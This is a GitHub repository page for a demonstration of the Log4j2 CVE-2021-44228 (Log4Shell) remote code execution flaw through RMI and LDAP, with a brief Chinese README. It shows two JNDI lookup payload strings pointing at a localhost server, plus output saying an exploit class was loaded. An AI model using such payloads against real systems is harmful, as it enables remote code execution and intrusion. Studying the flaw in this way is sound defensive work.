Skip to content
/ CVE-2021-44228-Demo Public

Apache Log4j2 CVE-2021-44228 RCE Demo with RMI and LDAP

License

MIT license
2 stars 3 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

mzlogin/CVE-2021-44228-Demo

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
ldap-server
ldap-server
 
 
rmi-server
rmi-server
 
 
server
server
 
 
tools
tools
 
 
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
pom.xml
pom.xml
 
 
result.png
result.png
 
 

Repository files navigation

CVE-2021-44228-Demo

利用 CVE-2021-44228,通过 RMI 和 LDAP 两种方式远程注入代码的示例。

Exploit class from RMI Server loaded
Hello, ${jndi:rmi://127.0.0.1:1099/exploit}
Exploit class from LDAP Server loaded
Hello, ${jndi:ldap://127.0.0.1:1389/org.mazhuang.ldap.Exploit}

RmiServer 和 LdapServer 启动依赖 Python3。

参考

About

Apache Log4j2 CVE-2021-44228 RCE Demo with RMI and LDAP

Topics

ldap rmi jndi cve-2021-44228

Resources

Readme

License

MIT license
Activity

Stars

2 stars

Watchers

3 watching

Forks

3 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages